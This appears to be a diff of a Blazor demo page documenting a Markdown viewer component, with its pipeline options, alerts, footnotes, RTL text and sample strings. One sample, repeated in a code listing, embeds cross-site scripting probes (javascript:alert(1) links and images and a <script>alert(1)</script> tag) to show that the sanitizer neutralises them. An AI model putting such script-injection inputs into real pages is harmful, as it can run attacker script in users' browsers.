+                    Description = "Adds autolink literals, so bare URLs and email addresses become links.",
+                },
+                new()
+                {
+                    Name = "UseEmojis",
+                    Type = "BitMarkdownPipelineBuilder UseEmojis(IReadOnlyDictionary<string, string>? overrides)",
+                    DefaultValue = "",
+                    Description = "Adds :shortcode: emoji replacement, optionally extending the built-in map with per-pipeline overrides.",
+                },
+                new()
+                {
+                    Name = "UseAutoIdentifiers",
+                    Type = "BitMarkdownPipelineBuilder UseAutoIdentifiers()",
+                    DefaultValue = "",
+                    Description = "Gives every heading a unique, URL-friendly id slug so it can be deep-linked.",
+                },
+                new()
+                {
+                    Name = "UseFootnotes",
+                    Type = "BitMarkdownPipelineBuilder UseFootnotes()",
+                    DefaultValue = "",
+                    Description = "Adds GitHub-style footnotes: a [^label] reference plus a [^label]: definition. Included in the GitHub bundle, because a footnote definition is also a valid link reference definition.",
+                },
+                new()
+                {
+                    Name = "UseAlerts",
+                    Type = "BitMarkdownPipelineBuilder UseAlerts()",
+                    DefaultValue = "",
+                    Description = "Adds GitHub alerts: > [!NOTE], > [!TIP], > [!IMPORTANT], > [!WARNING] and > [!CAUTION] block quotes render as titled callouts.",
+                },
+                new()
+                {
+                    Name = "UseSoftLineAsHardLine",
+                    Type = "BitMarkdownPipelineBuilder UseSoftLineAsHardLine()",
+                    DefaultValue = "",
+                    Description = "Renders every single newline as a line break, the way a chat or comment box does.",
+                },
+                new()
+                {
+                    Name = "UseGitHubFlavored",
+                    Type = "BitMarkdownPipelineBuilder UseGitHubFlavored()",
+                    DefaultValue = "",
+                    Description = "Adds the full GitHub bundle: pipe tables, strikethrough, task lists, autolinks, footnotes and alerts.",
+                },
+                new()
+                {
+                    Name = "UseAdvanced",
+                    Type = "BitMarkdownPipelineBuilder UseAdvanced()",
+                    DefaultValue = "",
+                    Description = "Adds the GitHub flavors plus emoji and auto-identifiers.",
+                },
+                new()
+                {
+                    Name = "Use",
+                    Type = "BitMarkdownPipelineBuilder Use(IBitMarkdownExtension extension)",
+                    DefaultValue = "",
+                    Description = "Adds a custom extension. An extension registers block parsers, inline parsers, delimiter processors, AST processors and/or renderers; everything it registers must be stateless, since a built pipeline is shared across concurrent parses.",
+                },
+                new()
+                {
+                    Name = "Build",
+                    Type = "BitMarkdownPipeline Build()",
+                    DefaultValue = "",
+                    Description = "Builds the immutable, reusable pipeline.",
+                    LinkType = LinkType.Link,
+                    Href = "#markdown-viewer-pipeline",
+                },
+            ]
+        },
+        new()
+        {
+            Id = "markdown-viewer-pipeline",
+            Title = "BitMarkdownPipeline",
+            Description = "An immutable, reusable Markdown processing configuration produced by a BitMarkdownPipelineBuilder. Pipelines are thread-safe and should be cached and shared rather than rebuilt per render.",
+            Parameters =
+            [
                 new()
                 {
                     Name = "Parse",
@@ -133,7 +284,7 @@ public partial class BitMarkdownViewerDemo
         {
             Id = "markdown-viewer-node",
             Title = "BitMarkdownNode",
-            Description = "The abstract base type for every node produced by the parser. Nodes expose their mutable child collections so that AST processors (plugins) can traverse and rewrite the tree generically, even for node types they did not define.",
+            Description = "The abstract base type for every node produced by the parser. Nodes expose their mutable child collections so that AST processors (plugins) can traverse and rewrite the tree generically, even for node types they did not define. BitMarkdownAstHelper.Descendants(node) walks the whole tree iteratively, so even pathologically nested documents cannot overflow the stack.",
             Parameters =
             [
                 new()
@@ -195,7 +346,7 @@ public partial class BitMarkdownViewerDemo
                 new()
                 {
                     Name = "SameOrigin",
-                    Description = "Only same-origin images (relative paths, anchors and same-document references) are loaded. Remote images (http:, https: and protocol-relative //) are blocked. The recommended mode for untrusted or AI-generated Markdown.",
+                    Description = "Only same-origin images (relative paths, anchors, same-document references and embedded data: images) are loaded. Cross-origin images (http:, https: and protocol-relative //) are blocked. The recommended mode for untrusted or AI-generated Markdown.",
                     Value = "1",
                 },
                 new()
@@ -206,11 +357,199 @@ public partial class BitMarkdownViewerDemo
                 },
             ]
         },
+        new()
+        {
+            Id = "markdown-viewer-alert-kind-enum",
+            Name = "BitMarkdownAlertKind",
+            Description = "The five GitHub alert kinds a > [!...] block quote can carry, in the order GitHub documents them.",
+            Items =
+            [
+                new() { Name = "Note", Description = "Useful information the reader should notice even when skimming.", Value = "0" },
+                new() { Name = "Tip", Description = "Optional advice for doing something better.", Value = "1" },
+                new() { Name = "Important", Description = "Key information the reader needs to succeed.", Value = "2" },
+                new() { Name = "Warning", Description = "Urgent information that needs immediate attention to avoid a problem.", Value = "3" },
+                new() { Name = "Caution", Description = "Advice about the risks or negative outcomes of an action.", Value = "4" },
+            ]
+        },
     ];
 
 
 
-    // -- Advanced (live editor) example --------------------------------------
+    // -- GitHub flavored example ---------------------------------------------
+
+    private readonly string gitHubMarkdown = @"# GitHub Flavored Markdown
+
+Supports ~~strikethrough~~ and bare links like https://bitplatform.dev
+
+## Task list
+
+- [x] Parse Markdown in pure C#
+- [x] Render the real render tree
+- [ ] Use any JavaScript
+
+## Table
+
+| Feature       | Basic | GitHub |
+|:--------------|:-----:|:------:|
+| Headings      |   ✔   |   ✔    |
+| Tables        |       |   ✔    |
+| Strikethrough |       |   ✔    |
+";
+
+
+
+    // -- Alerts example ------------------------------------------------------
+
+    private readonly string alertsMarkdown = @"> [!NOTE]
+> Useful information that users should know, even when skimming content.
+
+> [!TIP]
+> Helpful advice for doing things better or more easily.
+
+> [!IMPORTANT]
+> Key information users need to know to achieve their goal.
+
+> [!WARNING]
+> Urgent info that needs immediate user attention to avoid problems.
+
+> [!CAUTION]
+> Advises about risks or negative outcomes of certain actions.
+
+> A block quote without a marker is still an ordinary block quote.
+";
+
+
+
+    // -- Footnotes example ---------------------------------------------------
+
+    private readonly string footnotesMarkdown = @"The parser walks the source once[^once] and hands the renderer an AST[^ast],
+which is why the same note can be cited twice[^once].
+
+[^once]: One pass over the lines, then one pass over the inline text of each block.
+[^ast]: An abstract syntax tree - the tree of headings, paragraphs and inline runs
+    that the render tree is built from.
+";
+
+
+
+    // -- References & entities example ---------------------------------------
+
+    private readonly string referencesMarkdown = @"# Reference links
+
+The [bit platform][bit] site, the [Blazor docs][docs], and the same
+[bit] link again as a shortcut reference.
+
+Character references are decoded too: &copy; 2026 &mdash; &#169; is the same
+sign written as a number, and &#x2705; as hex. Inside code they stay literal:
+`&copy;`.
+
+[bit]: https://bitplatform.dev ""bit platform""
+[docs]: https://learn.microsoft.com/aspnet/core/blazor ""ASP.NET Core Blazor""
+";
+
+
+
+    // -- Line breaks example -------------------------------------------------
+
+    private readonly BitMarkdownPipeline softBreakPipeline = new BitMarkdownPipelineBuilder()
+        .UseSoftLineAsHardLine()
+        .Build();
+
+    private readonly string lineBreaksMarkdown = @"Roses are red
+Violets are blue
+Markdown reflows
+Unless you tell it not to";
+
+
+
+    // -- Custom pipeline example ---------------------------------------------
+
+    private readonly BitMarkdownPipeline customPipeline = new BitMarkdownPipelineBuilder()
+        .UsePipeTables()
+        .UseStrikethrough()
+        .UseTaskLists()
+        .UseEmojis()
+        .UseAutoIdentifiers()
+        .Build();
+
+    private readonly string customMarkdown = @"# Custom pipeline :sparkles:
+
+This viewer uses a pipeline composed with only the extensions we picked:
+pipe tables, strikethrough, task lists, emoji and auto identifiers.
+Autolinks were left out, so https://bitplatform.dev stays plain text.
+
+- [x] ~~Old~~ approach replaced
+- [ ] Anything left to do?
+";
+
+
+
+    // -- Untrusted content example -------------------------------------------
+
+    private static readonly BitMarkdownViewerImageRendering[] imageRenderingModes =
+    [
+        BitMarkdownViewerImageRendering.SameOrigin,
+        BitMarkdownViewerImageRendering.None,
+        BitMarkdownViewerImageRendering.All
+    ];
+
+    private BitMarkdownViewerImageRendering imageRendering = BitMarkdownViewerImageRendering.SameOrigin;
+
+    private readonly string untrustedMarkdown = @"### Content from somewhere else
+
+A same-origin image always loads:
+
+![the bit logo](/images/bit-logo-blue.png)
+
+A cross-origin one only loads under `All`:
+
+![a remote badge](https://img.shields.io/nuget/v/Bit.BlazorUI.Extras)
+
+Unsafe URLs never survive the sanitizer, whatever the policy:
+[a javascript link](javascript:alert(1)) and ![an unsafe image](javascript:alert(1)).
+
+Raw <b>HTML</b> and <script>alert(1)</script> are rendered as text.
+";
+
+
+
+    // -- Table of contents example -------------------------------------------
+
+    private record TocEntry(int Level, string Id, string Text);
+
+    private List<TocEntry> tocEntries = [];
+
+    private void HandleParsed(BitMarkdownDocumentNode document)
+    {
+        tocEntries = BitMarkdownAstHelper.Descendants(document)
+                                         .OfType<BitMarkdownHeadingNode>()
+                                         .Where(h => string.IsNullOrEmpty(h.Id) is false)
+                                         .Select(h => new TocEntry(h.Level, h.Id!, BitMarkdownInlineHelpers.PlainText(h.Inlines)))
+                                         .ToList();
+    }
+
+    private readonly string tocMarkdown = @"# Release notes
+
+## 9.4.0
+
+### Added
+
+Footnotes, alerts and reference links.
+
+### Fixed
+
+Truncation no longer splits a surrogate pair.
+
+## 9.3.0
+
+### Added
+
+The whole native parser.
+";
+
+
+
+    // -- Playground example --------------------------------------------------
 
     private MarkdownFlavor playgroundFlavor = MarkdownFlavor.Advanced;
     private BitMarkdownPipeline playgroundPipeline = BitMarkdownPipelines.Advanced;
@@ -231,9 +570,9 @@ public partial class BitMarkdownViewerDemo
 
     private string playgroundHint => playgroundFlavor switch
     {
-        MarkdownFlavor.Basic => "Basic CommonMark only. Tables, strikethrough, task lists, emoji and bare URLs render as plain text.",
-        MarkdownFlavor.GitHub => "GitHub Flavored Markdown: pipe tables, ~~strikethrough~~, task lists and autolink literals.",
-        _ => "Advanced: GitHub Flavored Markdown plus :sparkles: emoji and automatic heading ids."
+        MarkdownFlavor.Basic => "Basic CommonMark only - reference links and character references still work, but tables, strikethrough, task lists, footnotes, alerts, emoji and bare URLs render as plain text.",
+        MarkdownFlavor.GitHub => "The GitHub flavors: pipe tables, ~~strikethrough~~, task lists, autolink literals, footnotes and alerts.",
+        _ => "Advanced: the GitHub flavors plus :sparkles: emoji and automatic heading ids."
     };
 
     private const string SampleMarkdown = """
@@ -279,6 +618,11 @@ public partial class BitMarkdownViewerDemo
         }
         ```
 
+        ## Alerts
+
+        > [!TIP]
+        > Switch the Flavor above to Basic and watch this become an ordinary block quote.
+
         ## Blockquotes
 
         > "Any sufficiently advanced technology is indistinguishable from magic."
@@ -294,6 +638,14 @@ public partial class BitMarkdownViewerDemo
         | Task lists     |    Yes    | GitHub flavoured       |
         | Raw HTML       |    No     | Escaped for safety     |
 
+        ## Links and notes
+
+        Reference links keep the prose clean[^why]: see the [bit platform][bit] site.
+
+        [bit]: https://bitplatform.dev "bit platform"
+        [^why]: The destination is declared once, at the bottom, instead of interrupting
+            the sentence.
+
         ## Safety
 
         Link and image URLs are sanitized, so `javascript:` URIs are stripped and raw
@@ -306,6 +658,7 @@ public partial class BitMarkdownViewerDemo
         - Emoji shortcodes: :rocket: :sparkles: :tada: :fire: :+1:
         - Bare URLs become links: https://learn.microsoft.com
         - Email autolinks: support@example.com
+        - Character references: &copy; 2026 &mdash; decoded everywhere but in `code`
 
         Switch to **Basic** to see the same source rendered as plain CommonMark.
 
@@ -316,46 +669,23 @@ public partial class BitMarkdownViewerDemo
 
 
 
-    // -- GitHub flavored example ---------------------------------------------
+    // -- RTL example ---------------------------------------------------------
 
-    private readonly string gitHubMarkdown = @"# GitHub Flavored Markdown
+    private readonly string rtlMarkdown = @"# نمایشگر مارک‌داون
 
-Supports ~~strikethrough~~ and bare links like https://bitplatform.dev
+متن **درشت** و *مورب* در کنار `کد درون‌خطی`.
 
-## Task list
+> [!NOTE]
+> نوار رنگی این کادر با جهت متن جابه‌جا می‌شود.
 
-- [x] Parse Markdown in pure C#
-- [x] Render the real render tree
-- [ ] Use any JavaScript
+- مورد اول
+- مورد دوم
+    - مورد تودرتو
 
-## Table
-
-| Feature       | Basic | GitHub |
-|:--------------|:-----:|:------:|
-| Headings      |   ✔   |   ✔    |
-| Tables        |       |   ✔    |
-| Strikethrough |       |   ✔    |
-";
-
-
-
-    // -- Custom pipeline example ---------------------------------------------
-
-    private readonly BitMarkdownPipeline customPipeline = new BitMarkdownPipelineBuilder()
-        .UsePipeTables()
-        .UseStrikethrough()
-        .UseTaskLists()
-        .UseEmojis()
-        .UseAutoIdentifiers()
-        .Build();
-
-    private readonly string customMarkdown = @"# Custom pipeline :sparkles:
-
-This viewer uses a pipeline composed with only the extensions we picked:
-pipe tables, strikethrough, task lists, emoji and auto identifiers.
-
-- [x] ~~Old~~ approach replaced
-- [ ] Anything left to do?
+| ستون | مقدار |
+|:-----|------:|
+| یک   |     ۱ |
+| دو   |     ۲ |
 ";
 
 
@@ -386,6 +716,182 @@ Supports ~~strikethrough~~ and bare links like https://bitplatform.dev
 "";";
 
     private readonly string example3RazorCode = @"
+<BitMarkdownViewer Markdown=""@alertsMarkdown"" Pipeline=""BitMarkdownPipelines.GitHub"" />";
+    private readonly string example3CsharpCode = @"
+private readonly string alertsMarkdown = @""> [!NOTE]
+> Useful information that users should know, even when skimming content.
+
+> [!TIP]
+> Helpful advice for doing things better or more easily.
+
+> [!IMPORTANT]
+> Key information users need to know to achieve their goal.
+
+> [!WARNING]
+> Urgent info that needs immediate user attention to avoid problems.
+
+> [!CAUTION]
+> Advises about risks or negative outcomes of certain actions.
+
+> A block quote without a marker is still an ordinary block quote.
+"";";
+
+    private readonly string example4RazorCode = @"
+<BitMarkdownViewer Markdown=""@footnotesMarkdown"" Pipeline=""BitMarkdownPipelines.GitHub"" />";
+    private readonly string example4CsharpCode = @"
+private readonly string footnotesMarkdown = @""The parser walks the source once[^once] and hands the renderer an AST[^ast],
+which is why the same note can be cited twice[^once].
+
+[^once]: One pass over the lines, then one pass over the inline text of each block.
+[^ast]: An abstract syntax tree - the tree of headings, paragraphs and inline runs
+    that the render tree is built from.
+"";";
+
+    private readonly string example5RazorCode = @"
+<BitMarkdownViewer Markdown=""@referencesMarkdown"" />";
+    private readonly string example5CsharpCode = @"
+private readonly string referencesMarkdown = @""# Reference links
+
+The [bit platform][bit] site, the [Blazor docs][docs], and the same
+[bit] link again as a shortcut reference.
+
+Character references are decoded too: &copy; 2026 &mdash; &#169; is the same
+sign written as a number, and &#x2705; as hex. Inside code they stay literal:
+`&copy;`.
+
+[bit]: https://bitplatform.dev """"bit platform""""
+[docs]: https://learn.microsoft.com/aspnet/core/blazor """"ASP.NET Core Blazor""""
+"";";
+
+    private readonly string example6RazorCode = @"
+<div class=""mdv-columns"">
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">Default</div>
+        <BitMarkdownViewer Markdown=""@lineBreaksMarkdown"" />
+    </div>
+    <div class=""mdv-column"">
+        <div class=""mdv-column-title"">UseSoftLineAsHardLine()</div>
+        <BitMarkdownViewer Markdown=""@lineBreaksMarkdown"" Pipeline=""@softBreakPipeline"" />
+    </div>
+</div>";
+    private readonly string example6CsharpCode = @"
+private readonly BitMarkdownPipeline softBreakPipeline = new BitMarkdownPipelineBuilder()
+    .UseSoftLineAsHardLine()
+    .Build();
+
+private readonly string lineBreaksMarkdown = @""Roses are red
+Violets are blue
+Markdown reflows
+Unless you tell it not to"";";
+
+    private readonly string example7RazorCode = @"
+<BitMarkdownViewer Markdown=""@customMarkdown"" Pipeline=""customPipeline"" />";
+    private readonly string example7CsharpCode = @"
+private readonly BitMarkdownPipeline customPipeline = new BitMarkdownPipelineBuilder()
+    .UsePipeTables()
+    .UseStrikethrough()
+    .UseTaskLists()
+    .UseEmojis()
+    .UseAutoIdentifiers()
+    .Build();
+
+private readonly string customMarkdown = @""# Custom pipeline :sparkles:
+
+This viewer uses a pipeline composed with only the extensions we picked:
+pipe tables, strikethrough, task lists, emoji and auto identifiers.
+Autolinks were left out, so https://bitplatform.dev stays plain text.
+
+- [x] ~~Old~~ approach replaced
+- [ ] Anything left to do?
+"";";
+
+    private readonly string example8RazorCode = @"
+<div class=""mdv-toolbar"">
+    <span class=""mdv-label"">ImageRendering:</span>
+    @foreach (var mode in imageRenderingModes)
+    {
+        <BitButton Size=""BitSize.Small""
+                   aria-pressed=""@(imageRendering == mode)""
+                   Variant=""@(imageRendering == mode ? BitVariant.Fill : BitVariant.Outline)""
+                   OnClick=""@(() => imageRendering = mode)"">@mode</BitButton>
+    }
+</div>
+<BitMarkdownViewer Markdown=""@untrustedMarkdown""
+                   Pipeline=""BitMarkdownPipelines.GitHub""
+                   ImageRendering=""@imageRendering""
+                   StripBidiControlCharacters=""true""
+                   MaxLength=""100000"" />";
+    private readonly string example8CsharpCode = @"
+private static readonly BitMarkdownViewerImageRendering[] imageRenderingModes =
+[
+    BitMarkdownViewerImageRendering.SameOrigin,
+    BitMarkdownViewerImageRendering.None,
+    BitMarkdownViewerImageRendering.All
+];
+
+private BitMarkdownViewerImageRendering imageRendering = BitMarkdownViewerImageRendering.SameOrigin;
+
+private readonly string untrustedMarkdown = @""### Content from somewhere else
+
+A same-origin image always loads:
+
+![the bit logo](/images/bit-logo-blue.png)
+
+A cross-origin one only loads under `All`:
+
+![a remote badge](https://img.shields.io/nuget/v/Bit.BlazorUI.Extras)
+
+Unsafe URLs never survive the sanitizer, whatever the policy:
+[a javascript link](javascript:alert(1)) and ![an unsafe image](javascript:alert(1)).
+
+Raw <b>HTML</b> and <script>alert(1)</script> are rendered as text.
+"";";
+
+    private readonly string example9RazorCode = @"
+<div class=""mdv-toc-layout"">
+    <nav class=""mdv-toc"" aria-label=""On this page"">
+        <div class=""mdv-toc-title"">On this page</div>
+        @foreach (var entry in tocEntries)
+        {
+            <a class=""@($""mdv-toc-item mdv-toc-level-{entry.Level}"")"" href=""@($""#{entry.Id}"")"">@entry.Text</a>
+        }
+    </nav>
+    <BitMarkdownViewer Markdown=""@tocMarkdown"" Pipeline=""BitMarkdownPipelines.Advanced"" OnParsed=""HandleParsed"" />
+</div>";
+    private readonly string example9CsharpCode = @"
+private record TocEntry(int Level, string Id, string Text);
+
+private List<TocEntry> tocEntries = [];
+
+private void HandleParsed(BitMarkdownDocumentNode document)
+{
+    tocEntries = BitMarkdownAstHelper.Descendants(document)
+                                     .OfType<BitMarkdownHeadingNode>()
+                                     .Where(h => string.IsNullOrEmpty(h.Id) is false)
+                                     .Select(h => new TocEntry(h.Level, h.Id!, BitMarkdownInlineHelpers.PlainText(h.Inlines)))
+                                     .ToList();
+}
+
+private readonly string tocMarkdown = @""# Release notes
+
+## 9.4.0
+
+### Added
+
+Footnotes, alerts and reference links.
+
+### Fixed
+
+Truncation no longer splits a surrogate pair.
+
+## 9.3.0
+
+### Added
+
+The whole native parser.
+"";";
+
+    private readonly string example10RazorCode = @"
 <div class=""mdv-playground"">
     <div class=""mdv-toolbar"">
         <span class=""mdv-label"">Flavor:</span>
@@ -419,7 +925,7 @@ Supports ~~strikethrough~~ and bare links like https://bitplatform.dev
         </div>
     </div>
 </div>";
-    private readonly string example3CsharpCode = @"
+    private readonly string example10CsharpCode = @"
 private enum MarkdownFlavor { Basic, GitHub, Advanced }
 
 private MarkdownFlavor playgroundFlavor = MarkdownFlavor.Advanced;
@@ -441,30 +947,60 @@ private void ResetPlaygroundSample() => playgroundMarkdown = SampleMarkdown;
 
 private string playgroundHint => playgroundFlavor switch
 {
-    MarkdownFlavor.Basic => ""Basic CommonMark only. Tables, strikethrough, task lists, emoji and bare URLs render as plain text."",
-    MarkdownFlavor.GitHub => ""GitHub Flavored Markdown: pipe tables, ~~strikethrough~~, task lists and autolink literals."",
-    _ => ""Advanced: GitHub Flavored Markdown plus :sparkles: emoji and automatic heading ids.""
-};
+    MarkdownFlavor.Basic => ""Basic CommonMark only - reference links and character references still work, but tables, strikethrough, task lists, footnotes, alerts, emoji and bare URLs render as plain text."",
+    MarkdownFlavor.GitHub => ""The GitHub flavors: pipe tables, ~~strikethrough~~, task lists, autolink literals, footnotes and alerts."",
+    _ => ""Advanced: the GitHub flavors plus :sparkles: emoji and automatic heading ids.""
+};";
 
-private const string SampleMarkdown = ""# BitMarkdownViewer\n\nA **native Blazor** Markdown viewer written in _pure C#_ - no JavaScript.\n\n- Headings, **bold**, *italic*, ~~strikethrough~~\n- `inline code` and fenced code blocks\n- [Links](https://bitplatform.dev) and task lists:\n    - [x] Parse blocks\n    - [ ] Conquer the world\n\n> Switch the Flavor above to compare rendering."";";
+    private readonly string example11RazorCode = @"
+<BitMarkdownViewer Style=""border-inline-start:0.25rem solid var(--bit-clr-pri);padding-inline-start:1rem""
+                   Markdown=""@(""A **styled** viewer, set apart with an inline `Style`."")"" />
 
-    private readonly string example4RazorCode = @"
-<BitMarkdownViewer Markdown=""@customMarkdown"" Pipeline=""customPipeline"" />";
-    private readonly string example4CsharpCode = @"
-private readonly BitMarkdownPipeline customPipeline = new BitMarkdownPipelineBuilder()
-    .UsePipeTables()
-    .UseStrikethrough()
-    .UseTaskLists()
-    .UseEmojis()
-    .UseAutoIdentifiers()
-    .Build();
+<BitMarkdownViewer Class=""custom-mdv""
+                   Markdown=""@(""### A classy viewer\n\nEvery `code` span and heading inside it is restyled from the page's own stylesheet."")"" />";
+    private readonly string example11ScssCode = @"
+.custom-mdv {
+    padding: 1rem;
+    border-radius: 0.5rem;
+    background: $bit-color-background-secondary;
 
-private readonly string customMarkdown = @""# Custom pipeline :sparkles:
+    h3 {
+        margin-top: 0;
+        color: $bit-color-primary;
+    }
 
-This viewer uses a pipeline composed with only the extensions we picked:
-pipe tables, strikethrough, task lists, emoji and auto identifiers.
+    code {
+        color: $bit-color-primary-dark;
+        background: $bit-color-background-primary-light;
+    }
+}";
+    private readonly DemoCodeFile[] example11CodeFiles;
 
-- [x] ~~Old~~ approach replaced
-- [ ] Anything left to do?
+    private readonly string example12RazorCode = @"
+<BitMarkdownViewer Dir=""BitDir.Rtl"" Markdown=""@rtlMarkdown"" Pipeline=""BitMarkdownPipelines.Advanced"" />";
+    private readonly string example12CsharpCode = @"
+private readonly string rtlMarkdown = @""# نمایشگر مارک‌داون
+
+متن **درشت** و *مورب* در کنار `کد درون‌خطی`.
+
+> [!NOTE]
+> نوار رنگی این کادر با جهت متن جابه‌جا می‌شود.
+
+- مورد اول
+- مورد دوم
+    - مورد تودرتو
+
+| ستون | مقدار |
+|:-----|------:|
+| یک   |     ۱ |
+| دو   |     ۲ |
 "";";
+
+    public BitMarkdownViewerDemo()
+    {
+        example11CodeFiles =
+        [
+            new("BitMarkdownViewerDemo.razor.scss", example11ScssCode),
+        ];
+    }
 }

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
@@ -38,6 +38,17 @@ public partial class BitMarkdownViewerDemo
         },
         new()
         {
+           Name = "Inline",
+           Type = "bool",
+           DefaultValue = "false",
+           Description = @"Renders the document as inline content: the root element becomes a span and each top-level
+                           paragraph contributes its inline content directly, without the <p> that would otherwise force
+                           a line of its own. Use it where a short piece of Markdown has to sit inside a sentence, a
+                           table cell or a label. Blocks that are not paragraphs (lists, tables, headings) still render
+                           as themselves.",
+        },
+        new()
+        {
            Name = "MaxNestingDepth",
            Type = "int",
            DefaultValue = "100",
@@ -65,6 +76,46 @@ public partial class BitMarkdownViewerDemo
                            from the headings, for example - or rewrite it before it reaches the DOM.",
            LinkType = LinkType.Link,
            Href = "#markdown-viewer-document-node",
+        },
+        new()
+        {
+           Name = "CodeBlockTemplate",
+           Type = "RenderFragment<BitMarkdownCodeBlockNode>?",
+           DefaultValue = "null",
+           Description = @"Renders every fenced or indented code block, instead of the <pre><code> the viewer would otherwise
+                           draw. This is where a syntax highlighter, a copy button or a diagram renderer goes: the template
+                           is given the block, so it can read the language off Info and the source off Content.",
+        },
+        new()
+        {
+           Name = "ImageTemplate",
+           Type = "RenderFragment<BitMarkdownImageNode>?",
+           DefaultValue = "null",
+           Description = @"Renders every image, instead of the <img> the viewer would otherwise draw - for a lightbox, a
+                           placeholder while it loads, or a component that serves a modern format. The ImageRendering
+                           policy has already been applied, so a blocked image reaches the template with an empty Url.",
+        },
+        new()
+        {
+           Name = "LinkTemplate",
+           Type = "RenderFragment<BitMarkdownLinkNode>?",
+           DefaultValue = "null",
+           Description = @"Renders every link, instead of the <a> the viewer would otherwise draw - to route an in-app
+                           destination through the router, or to decorate an external one. The destination has already been
+                           sanitized. A link's own content is not rendered for you; read
+                           BitMarkdownInlineHelpers.PlainText(context.Children) for its text.",
+        },
+        new()
+        {
+           Name = "OnTaskChanged",
+           Type = "EventCallback<BitMarkdownViewerTaskChangedEventArgs>",
+           DefaultValue = "",
+           Description = @"Called when a reader ticks or unticks a task-list checkbox, with the source rewritten to match.
+                           Setting it is what makes the checkboxes interactive at all: with no handler they stay the
+                           read-only boxes GitHub renders. The viewer does not change Markdown itself - it hands you the
+                           new source and leaves storing it to you. Requires the task-list flavor.",
+           LinkType = LinkType.Link,
+           Href = "#markdown-viewer-task-changed-args",
         },
         new()
         {
@@ -120,7 +171,7 @@ public partial class BitMarkdownViewerDemo
                     Name = "Advanced",
                     Type = "static BitMarkdownPipeline",
                     DefaultValue = "",
-                    Description = "The GitHub flavors plus :shortcode: emoji and automatic heading ids.",
+                    Description = "The GitHub flavors plus front matter, the emphasis extras, containers, definition lists, abbreviations, figures, :shortcode: emoji and automatic heading ids.",
                 },
             ]
         },
@@ -175,6 +226,71 @@ public partial class BitMarkdownViewerDemo
                 },
                 new()
                 {
+                    Name = "UseEmphasisExtras",
+                    Type = "BitMarkdownPipelineBuilder UseEmphasisExtras()",
+                    DefaultValue = "",
+                    Description = "Adds the emphasis flavors beyond * , _ and ~~ : ~subscript~, ^superscript^, ++inserted++ and ==highlighted==, rendered as <sub>, <sup>, <ins> and <mark>. Implies strikethrough, because subscript shares the ~ character with it.",
+                },
+                new()
+                {
+                    Name = "UseContainers",
+                    Type = "BitMarkdownPipelineBuilder UseContainers()",
+                    DefaultValue = "",
+                    Description = "Adds custom containers: ':::name optional title' ... ':::' renders as a div classed after the name, which is how documentation sites write admonitions and layout blocks. Containers nest, and the name 'details' renders a real <details> with the title as its <summary>.",
+                },
+                new()
+                {
+                    Name = "UseDefinitionLists",
+                    Type = "BitMarkdownPipelineBuilder UseDefinitionLists()",
+                    DefaultValue = "",
+                    Description = "Adds definition lists: a term on its own line followed by ': its definition' renders as a real <dl> of <dt> and <dd>.",
+                },
+                new()
+                {
+                    Name = "UseAbbreviations",
+                    Type = "BitMarkdownPipelineBuilder UseAbbreviations()",
+                    DefaultValue = "",
+                    Description = "Adds abbreviations: '*[HTML]: HyperText Markup Language' declares a term once and every whole-word occurrence of it becomes an <abbr> carrying the expansion.",
+                },
+                new()
+                {
+                    Name = "UseMathematics",
+                    Type = "BitMarkdownPipelineBuilder UseMathematics()",
+                    DefaultValue = "",
+                    Description = "Adds mathematics: $inline$ and $$display$$ are kept verbatim - safe from Markdown's own emphasis and escape rules - and marked as span.math-inline / div.math-display for a client-side typesetter such as KaTeX or MathJax.",
+                },
+                new()
+                {
+                    Name = "UseFigures",
+                    Type = "BitMarkdownPipelineBuilder UseFigures()",
+                    DefaultValue = "",
+                    Description = "Adds figures: an image alone in a paragraph and written with a title renders as a <figure> with that title as its <figcaption>.",
+                },
+                new()
+                {
+                    Name = "UseFrontMatter",
+                    Type = "BitMarkdownPipelineBuilder UseFrontMatter()",
+                    DefaultValue = "",
+                    Description = "Adds YAML (---) and TOML (+++) front matter, so a metadata block at the top of the document is parsed into a BitMarkdownFrontMatterNode that renders nothing instead of showing up as a thematic break and a heading.",
+                    LinkType = LinkType.Link,
+                    Href = "#markdown-viewer-front-matter-node",
+                },
+                new()
+                {
+                    Name = "UseSmartyPants",
+                    Type = "BitMarkdownPipelineBuilder UseSmartyPants()",
+                    DefaultValue = "",
+                    Description = "Adds typographic replacement: curly quotes, en and em dashes, ellipses and guillemets. Code spans, code blocks and URLs keep every character as written.",
+                },
+                new()
+                {
+                    Name = "UseAutoIdentifiers",
+                    Type = "BitMarkdownPipelineBuilder UseAutoIdentifiers(bool anchorLinks)",
+                    DefaultValue = "",
+                    Description = "Gives every heading a unique, URL-friendly id slug so it can be deep-linked, and - when anchorLinks is true - appends a permalink to each heading. A heading may also name its own id by ending with {#the-id}, which is removed from the rendered text.",
+                },
+                new()
+                {
                     Name = "UseFootnotes",
                     Type = "BitMarkdownPipelineBuilder UseFootnotes()",
                     DefaultValue = "",
@@ -186,6 +302,40 @@ public partial class BitMarkdownViewerDemo
                     Type = "BitMarkdownPipelineBuilder UseAlerts()",
                     DefaultValue = "",
                     Description = "Adds GitHub alerts: > [!NOTE], > [!TIP], > [!IMPORTANT], > [!WARNING] and > [!CAUTION] block quotes render as titled callouts.",
+                },
+                new()
+                {
+                    Name = "UseTexts",
+                    Type = "BitMarkdownPipelineBuilder UseTexts(BitMarkdownTexts texts)",
+                    DefaultValue = "",
+                    Description = "Sets the words the renderers write themselves - alert titles, footnote back-links, the accessible names of the regions and controls the markup adds - so a rendered document can be in a language other than English.",
+                    LinkType = LinkType.Link,
+                    Href = "#markdown-viewer-texts",
+                },
+                new()
+                {
+                    Name = "UseUrlRewriter",
+                    Type = "BitMarkdownPipelineBuilder UseUrlRewriter(Func<BitMarkdownUrlRewriteContext, string?> rewrite)",
+                    DefaultValue = "",
+                    Description = "Rewrites every link and image destination through a function of your own. The result is sanitized again on the way out, so a rewriter can never reintroduce an unsafe destination; returning null drops the destination and keeps the text.",
+                    LinkType = LinkType.Link,
+                    Href = "#markdown-viewer-url-rewrite-context",
+                },
+                new()
+                {
+                    Name = "UseBaseUrl",
+                    Type = "BitMarkdownPipelineBuilder UseBaseUrl(string baseUrl)",
+                    DefaultValue = "",
